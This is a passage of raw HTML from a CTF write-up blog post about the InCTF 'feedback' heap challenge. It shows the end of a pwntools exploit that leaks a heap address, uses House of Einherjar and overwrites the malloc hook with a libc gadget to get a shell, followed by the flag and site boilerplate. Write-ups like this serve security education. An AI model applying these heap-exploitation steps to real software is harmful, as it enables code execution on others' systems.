    <span class="n">r</span><span class="p">.</span><span class="n">sendafter</span><span class="p">(</span><span class="s">"Enter Team Name and Details: "</span><span class="p">,</span><span class="s">"A"</span><span class="o">*</span><span class="mh">0x340</span><span class="o">+</span><span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span><span class="o">+</span><span class="n">p64</span><span class="p">(</span><span class="mh">0x51</span><span class="p">))</span>
    <span class="n">r</span><span class="p">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s">"Confirm? &lt;y/n&gt;: "</span><span class="p">,</span><span class="s">'y'</span><span class="p">)</span>
    <span class="n">r</span><span class="p">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s">"Now give us your contact details: "</span><span class="p">,</span><span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span><span class="o">+</span><span class="n">p64</span><span class="p">(</span><span class="n">libc</span><span class="p">.</span><span class="n">address</span><span class="o">+</span><span class="mh">0x3c4910</span><span class="p">))</span>


<span class="k">def</span> <span class="nf">terminate</span><span class="p">():</span>

    <span class="s">''' overwrite malloc hook '''</span>

    <span class="n">r</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">"Enter this captcha code: "</span><span class="p">)</span>
    <span class="n">captcha</span><span class="o">=</span><span class="n">r</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">'</span><span class="se">\n</span><span class="s">'</span><span class="p">).</span><span class="n">strip</span><span class="p">()</span>
    <span class="n">r</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">captcha</span><span class="o">+</span><span class="s">'</span><span class="se">\x00</span><span class="s">'</span><span class="o">+</span><span class="n">p64</span><span class="p">(</span><span class="n">libc</span><span class="p">.</span><span class="n">address</span><span class="o">+</span><span class="mh">0x3c6790</span><span class="p">)</span><span class="o">+</span><span class="n">p64</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">,</span><span class="n">signed</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span><span class="o">+</span><span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span><span class="o">+</span><span class="n">p64</span><span class="p">(</span><span class="n">libc</span><span class="p">.</span><span class="n">address</span><span class="o">+</span><span class="mh">0x3c49c0</span><span class="p">)</span><span class="o">+</span><span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span><span class="o">*</span><span class="mi">6</span><span class="o">+</span><span class="n">p64</span><span class="p">(</span><span class="n">libc</span><span class="p">.</span><span class="n">address</span><span class="o">+</span><span class="mh">0x3c36e0</span><span class="p">)</span><span class="o">+</span><span class="s">"A"</span><span class="o">*</span><span class="mh">0x150</span><span class="o">+</span><span class="n">p64</span><span class="p">(</span><span class="n">libc</span><span class="p">.</span><span class="n">address</span><span class="o">+</span><span class="mh">0xf0274</span><span class="p">))</span>


<span class="k">def</span> <span class="nf">getleak</span><span class="p">():</span>

    <span class="s">''' Heap Leak '''</span>

    <span class="n">add_draft</span><span class="p">(</span><span class="s">"A"</span><span class="o">*</span><span class="mi">32</span><span class="p">,</span><span class="o">-</span><span class="mi">1</span><span class="p">,</span><span class="s">"AA"</span><span class="p">,</span><span class="n">line</span><span class="o">=</span><span class="bp">False</span><span class="p">)</span>
    <span class="n">view</span><span class="p">()</span>
    <span class="n">r</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">"Title: "</span><span class="o">+</span><span class="s">"A"</span><span class="o">*</span><span class="mi">32</span><span class="p">)</span>
    <span class="n">r</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">8</span><span class="p">)</span>
    <span class="n">heap</span><span class="o">=</span><span class="n">u64</span><span class="p">(</span><span class="n">r</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">'</span><span class="se">\n</span><span class="s">'</span><span class="p">).</span><span class="n">strip</span><span class="p">().</span><span class="n">ljust</span><span class="p">(</span><span class="mi">8</span><span class="p">,</span><span class="s">'</span><span class="se">\x00</span><span class="s">'</span><span class="p">))</span><span class="o">-</span><span class="mh">0x10</span>
    <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">"heap @ "</span><span class="o">+</span><span class="nb">hex</span><span class="p">(</span><span class="n">heap</span><span class="p">))</span>

    <span class="s">''' House of Einherjar '''</span>

    <span class="n">add_draft</span><span class="p">(</span><span class="s">"A"</span><span class="p">,</span><span class="mh">0x3c8</span><span class="p">,</span><span class="s">"B"</span><span class="o">*</span><span class="mh">0x340</span><span class="o">+</span><span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span><span class="o">+</span><span class="n">p64</span><span class="p">(</span><span class="mh">0x1a1</span><span class="p">)</span><span class="o">+</span><span class="n">p64</span><span class="p">(</span><span class="n">heap</span><span class="o">+</span><span class="mh">0x860</span><span class="p">)</span><span class="o">*</span><span class="mi">4</span><span class="p">)</span>
    <span class="n">add_draft</span><span class="p">(</span><span class="s">"A"</span><span class="p">,</span><span class="mh">0x80</span><span class="p">,</span><span class="s">"A"</span><span class="p">)</span>
    <span class="n">leave_name</span><span class="p">(</span><span class="s">"A"</span><span class="p">)</span>
    <span class="n">create</span><span class="p">()</span>
    <span class="n">add_draft</span><span class="p">(</span><span class="s">"A"</span><span class="p">,</span><span class="mh">0x100</span><span class="p">,</span><span class="n">p64</span><span class="p">(</span><span class="mh">0x21</span><span class="p">)</span><span class="o">*</span><span class="mi">20</span><span class="p">)</span>
    <span class="n">leave_name</span><span class="p">(</span><span class="s">"A"</span><span class="o">*</span><span class="mi">128</span><span class="o">+</span><span class="n">p64</span><span class="p">(</span><span class="mh">0x1a0</span><span class="p">)</span><span class="o">+</span><span class="s">'</span><span class="se">\x30</span><span class="s">'</span><span class="p">,</span><span class="n">line</span><span class="o">=</span><span class="bp">False</span><span class="p">)</span>

    <span class="n">save</span><span class="p">()</span>

    <span class="n">terminate</span><span class="p">()</span>


<span class="k">if</span> <span class="n">__name__</span><span class="o">==</span><span class="s">'__main__'</span><span class="p">:</span>

    <span class="n">getleak</span><span class="p">()</span>
    <span class="n">r</span><span class="p">.</span><span class="n">interactive</span><span class="p">()</span>
</pre></td></tr></tbody></table></code></div></div>

<p>And the flag was</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>InCTF{uns0rt3d_b1n_t0_d3str0y_f33db4ck}
</pre></td></tr></tbody></table></code></div></div>

<p>This was our second time hosting an International CTF and I hope you enjoyed the challenges. If anything about this challenge is unclear or you want to leave a actual “feedback” (:P) of our CTF, please fell free to leave a comment.</p>

        
      </div>

      <div class="post-tail-wrapper text-muted">

        <!-- categories -->
        
        <div class="post-meta mb-3">
          <i class="far fa-folder-open fa-fw mr-1"></i>
          
            <a href='/categories/ctf-writeup/'>CTF_writeup</a>,
            <a href='/categories/exploitation/'>Exploitation</a>
        </div>
        

        <!-- tags -->
        
        <div class="post-tags">
          <i class="fa fa-tags fa-fw mr-1"></i>
          
          <a href="/tags/writeup/"
            class="post-tag no-text-decoration" >writeup</a>
          
          <a href="/tags/unsortedbin/"
            class="post-tag no-text-decoration" >unsortedbin</a>
          
          <a href="/tags/heap/"
            class="post-tag no-text-decoration" >heap</a>
          
          <a href="/tags/filestructure/"
            class="post-tag no-text-decoration" >filestructure</a>
          
          </div>
        

        <div class="post-tail-bottom
          d-flex justify-content-between align-items-center mt-3 pt-5 pb-2">
          
          <div class="license-wrapper">
            This post is licensed under
            <a href="https://creativecommons.org/licenses/by/4.0/">CC BY 4.0</a>
            by the author.
          </div>
          

          <!--
 Post sharing snippet

 v2.1
 https://github.com/cotes2020/jekyll-theme-chirpy
 © 2019 Cotes Chung
 Published under the MIT License
-->

<div class="share-wrapper">
  <span class="share-label text-muted mr-1">Share</span>
  <span class="share-icons">
    
    

    
      
        <a href="https://twitter.com/intent/tweet?text=InCTF: feedback Writeup - sherl0ck's home&url=http://localhost:4000/posts/feedback/" data-toggle="tooltip" data-placement="top"
          title="Twitter" target="_blank" rel="noopener" aria-label="Twitter">
          <i class="fa-fw fab fa-twitter"></i>
        </a>
    
      
        <a href="https://www.facebook.com/sharer/sharer.php?title=InCTF: feedback Writeup - sherl0ck's home&u=http://localhost:4000/posts/feedback/" data-toggle="tooltip" data-placement="top"
          title="Facebook" target="_blank" rel="noopener" aria-label="Facebook">
          <i class="fa-fw fab fa-facebook-square"></i>
        </a>
    
      
        <a href="https://telegram.me/share?text=InCTF: feedback Writeup - sherl0ck's home&url=http://localhost:4000/posts/feedback/" data-toggle="tooltip" data-placement="top"
          title="Telegram" target="_blank" rel="noopener" aria-label="Telegram">
          <i class="fa-fw fab fa-telegram"></i>
        </a>
    

    <i class="fa-fw fas fa-link small" onclick="copyLink()"
        data-toggle="tooltip" data-placement="top" title="Copy link"></i>

  </span>
</div>


        </div><!-- .post-tail-bottom -->

      </div><!-- div.post-tail -->

    </div> <!-- .post -->


  </div> <!-- #post-wrapper -->

  

  

  <!--
  The Pannel on right side (Desktop views)
  v2.0
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2017-2019 Cotes Chung
  MIT License
-->

<div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down">

  <div class="access">

  














  

    <div id="access-lastmod" class="post">
      <span>Recent Update</span>
      <ul class="post-content pl-0 pb-1 ml-1 mt-2">

      
        
        
        
        <li><a href="/posts/memoheap/">AceBear CTF: memo_heap Writeup</a></li>
      
        
        
        
        <li><a href="/posts/findfile/">FindFile</a></li>
      
        
        
        
        <li><a href="/posts/fastbin-dup/">Fastbin dup with House of Orange</a></li>
      
        
        
        
        <li><a href="/posts/feedback/">InCTF: feedback Writeup</a></li>
      
        
        
        
        <li><a href="/posts/lost/">InCTF: lost Writeup</a></li>
      

      </ul>
    </div> <!-- #access-lastmod -->

  

  















  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        



  
    <div id="access-tags">
      <span>Trending Tags</span>
      <div class="d-flex flex-wrap mt-3 mb-1 mr-3">

      
        
        <a class="post-tag" href="/tags/writeup/">writeup</a>
      
        
        <a class="post-tag" href="/tags/heap/">heap</a>
      
        
        <a class="post-tag" href="/tags/spidermonkey/">spidermonkey</a>
      
        
        <a class="post-tag" href="/tags/fastbin/">fastbin</a>
      
        
        <a class="post-tag" href="/tags/experience/">Experience</a>
      
        
        <a class="post-tag" href="/tags/filestructure/">filestructure</a>
      
        
        <a class="post-tag" href="/tags/jit/">jit</a>
      
        
        <a class="post-tag" href="/tags/non-tech/">Non-tech</a>
      
        
        <a class="post-tag" href="/tags/browser/">browser</a>
      
        
        <a class="post-tag" href="/tags/forensics/">Forensics</a>
      

      </div>
    </div>
  
  </div> <!-- .access -->

  
    <div id="toc-wrapper" class="pl-0 pr-4 mb-5">
      <span class="pl-3 pt-2 mb-2">Contents</span>
      <nav id="toc" data-toggle="toc"></nav>
    </div>
  

</div> <!-- #panel-wrapper -->


</div> <!-- .row -->

<div class="row">
  <div class="col-12 col-lg-11 col-xl-8">
    <div id="post-extend-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4">

    <!--
 Recommend the other 3 posts according to the tags and categories of the current post,
 if the number is not enough, use the other latest posts to supplement.

 v2.0
 https://github.com/cotes2020/jekyll-theme-chirpy
 © 2019 Cotes Chung
 Published under the MIT License
-->

<!-- The total size of related posts  -->


<!-- An random integer that bigger than 0  -->


<!-- Equals to TAG_SCORE / {max_categories_hierarchy}  -->








  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  
    
  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  








<!-- Fill with the other newlest posts  -->






  <div id="related-posts" class="mt-5 mb-2 mb-sm-4">
    <h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3>
    <div class="card-deck mb-4">
    
      
      
      <div class="card">
        <a href="/posts/babytcache/">
          <div class="card-body">
            <!--
  Date format snippet

  v2.4.1
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2020 Cotes Chung
  MIT License
-->
<span class="timeago small"
  >

  
  

  
    Oct 25, 2018
  

  <i class="unloaded">2018-10-25T00:00:00+05:30</i>

</span>
            <h3 class="pt-0 mt-1 mb-3" data-toc-skip>HITCON CTF: baby_tcache Writeup</h3>
            <div class="text-muted small">
              <p>
                





                Attachments: binary     libc     exploit

This was a really fun challenge created by angelboy for HITCON CTF 2018. The following will be a writeup for the intended solution as gathered from the exp...
              </p>
            </div>
          </div>
        </a>
      </div>
    
      
      
      <div class="card">
        <a href="/posts/memoheap/">
          <div class="card-body">
            <!--
  Date format snippet

  v2.4.1
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2020 Cotes Chung
  MIT License
-->
<span class="timeago small"
  >

  
  

  
    Feb  1, 2018
  

  <i class="unloaded">2018-02-01T00:00:00+05:30</i>

</span>
            <h3 class="pt-0 mt-1 mb-3" data-toc-skip>AceBear CTF: memo_heap Writeup</h3>
            <div class="text-muted small">
              <p>
                





                I didn’t get a chance to try this challenge out during the CTF, but it was a pretty interesting and fun challenge. The method I am going to describe may not be the most efficient but this is what c...
              </p>
            </div>
          </div>
        </a>
      </div>
    
      
      
      <div class="card">
        <a href="/posts/lost/">
          <div class="card-body">
            <!--
  Date format snippet

  v2.4.1
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2020 Cotes Chung
  MIT License
-->
<span class="timeago small"
  >

  
  

  
    Oct 12, 2018
  

  <i class="unloaded">2018-10-12T00:00:00+05:30</i>

</span>
            <h3 class="pt-0 mt-1 mb-3" data-toc-skip>InCTF: lost Writeup</h3>
            <div class="text-muted small">
              <p>
                





                Attachments: binary     libc     source

The binary is a 64-bit ELF, non-stripped. Here are the mitigation’s enforced.
1
2
3
4
5
6
  gdb-peda$ checksec
  CANARY    : ENABLED
  FORTIFY   : disabled
...
              </p>
            </div>
          </div>
        </a>
      </div>
    
    </div> <!-- .card-deck -->
  </div> <!-- #related-posts -->



    <!--
  Navigation buttons at the bottom of the post.

  v2.1
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2020 Cotes Chung
  MIT License
-->

<div class="post-navigation d-flex justify-content-between">
  
  <a href="/posts/fastbin-dup/" class="btn btn-outline-primary">
    <p>Fastbin dup with House of Orange</p>
  </a>
  

  
  <a href="/posts/lost/" class="btn btn-outline-primary">
    <p>InCTF: lost Writeup</p>
  </a>
  

</div>

    

    </div> <!-- #post-extend-wrapper -->

  </div> <!-- .col-* -->

</div> <!-- .row -->

<!-- image lazy load: https://github.com/ApoorvSaxena/lozad.js -->
<script type="text/javascript" src="https://cdn.jsdelivr.net/npm/lozad/dist/lozad.min.js"></script>

<script type="text/javascript">
  const imgs = document.querySelectorAll('#post-wrapper img');
  const observer = lozad(imgs);
  observer.observe();
</script>



        <!--
  The Footer
  v2.0
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2017-2019 Cotes Chung
  MIT License
-->

<footer class="d-flex w-100 justify-content-center">
  <div class="d-flex justify-content-between align-items-center">
    <div class="footer-left">
      <p class="mb-0">
        © 2020
        <a href="https://twitter.com/username">Vignesh Rao</a>.
        
        <span data-toggle="tooltip" data-placement="top"
          title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span>
        
      </p>
    </div>

    <div class="footer-right">
      <p class="mb-0">
        Powered by
        <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a>
        with
        <a href="https://github.com/cotes2020/jekyll-theme-chirpy/" target="_blank" rel="noopener">Chirpy</a>
        theme.
      </p>
    </div>

  </div> <!-- div.d-flex -->
</footer>


      </div>

      <!--
  The Search results
  v2.0
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2017-2019 Cotes Chung
  MIT License
-->
<div id="search-result-wrapper" class="d-flex justify-content-center unloaded">
  <div class="col-12 col-xl-11 post-content">
    <div id="search-hints">
      <h4 class="text-muted mb-4">Trending Tags</h4>

      















  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        



      
        
        <a class="post-tag" href="/tags/writeup/">writeup</a>
      
        
        <a class="post-tag" href="/tags/heap/">heap</a>
      
        
        <a class="post-tag" href="/tags/spidermonkey/">spidermonkey</a>
      
        
        <a class="post-tag" href="/tags/fastbin/">fastbin</a>
      
        
        <a class="post-tag" href="/tags/experience/">Experience</a>
      
        
        <a class="post-tag" href="/tags/filestructure/">filestructure</a>
      
        
        <a class="post-tag" href="/tags/jit/">jit</a>
      
        
        <a class="post-tag" href="/tags/non-tech/">Non tech</a>
      
        
        <a class="post-tag" href="/tags/browser/">browser</a>
      
        
        <a class="post-tag" href="/tags/forensics/">Forensics</a>
      

    </div>
    <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
  </div>
</div>


    </div> <!-- #main-wrapper -->

    

    <div id="mask"></div>

    <a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button">
      <i class="fas fa-angle-up"></i>
    </a>

    <!--
  Jekyll Simple Search loader
  v2.0
  https://github.com/cotes2020/jekyll-theme-chirpy
  © 2017-2019 Cotes Chung
  MIT License
-->





<script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.7.3/dest/simple-jekyll-search.min.js"></script>

<script>
SimpleJekyllSearch({
  searchInput: document.getElementById('search-input'),
  resultsContainer: document.getElementById('search-results'),
  json: '/assets/js/data/search.json',
  searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0">  <a href="http://localhost:4000{url}">{title}</a>  <div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1">    <div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>{categories}</div>    <div><i class="fa fa-tag fa-fw"></i>{tags}</div>  </div>  <p>{snippet}</p></div>',
  noResultsText: '<p class="mt-5">Oops! No result founds.</p>'
});
</script>

  </body>

</html>

